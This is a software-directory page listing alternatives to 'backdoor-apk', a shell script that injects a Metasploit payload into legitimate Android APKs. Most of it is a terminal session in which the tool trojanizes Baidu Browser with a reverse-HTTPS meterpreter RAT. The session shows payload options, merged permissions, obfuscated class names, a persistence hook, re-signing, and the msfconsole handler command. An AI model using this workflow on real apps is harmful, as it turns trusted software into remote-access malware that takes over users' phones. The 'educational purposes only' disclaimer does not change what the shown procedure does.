backdoor-apk alternatives and similar packages
Based on the "Security & Decompiler" category.
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DISCONTINUED. Enjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications. -
CLI tool for decompiling Android apps to Java. It does resources! It does Java! Its real easy!
InfluxDB - Purpose built for real-time analytics at any scale.
* Code Quality Rankings and insights are calculated and provided by Lumnify.
They vary from L1 to L5 with "L5" being the highest.
Do you think we are missing an alternative of backdoor-apk or a related project?
backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
root@kali:~/Code/github/backdoor-apk/backdoor-apk# ./ BaiduBrowser.apk
/ ______ \
|| _ _ ||
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
|||_||_||| AAA AAA PPP KKK KKK
||______|| AAA AAA PPP KKK KKK
|____________| Dana James Traversie
[*] Running v0.2.4a on Fri Sep 28 17:13:37 EDT 2018
[+] Android payload options:
1) meterpreter/reverse_http 4) shell/reverse_http
2) meterpreter/reverse_https 5) shell/reverse_https
3) meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value:
[?] Please enter an LPORT value: 443
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/baidu/browser/inter
[+] Smali file to hook RAT payload: com/baidu/browser/inter/BdApplication.smali
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Injecting helpful Java classes in RAT APK file...done.
[*] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/baidu/browser/inter/pjese
[+] Generated new smali class name for MainBroadcastReceiver.smali: Iivym
[+] Generated new smali class name for MainService.smali: Aupyx
[+] Generated new smali class name for Payload.smali: Nwiuc
[+] Generated new smali class name for StringObfuscator.smali: Abnrw
[+] Generated new smali method name for StringObfuscator.obfuscate method: icobf
[+] Generated new smali method name for StringObfuscator.unobfuscate method: wbcik
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
The recompiled APK will be found in the 'original/dist' directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection via the generated resource script: msfconsole -r backdoor-apk.rc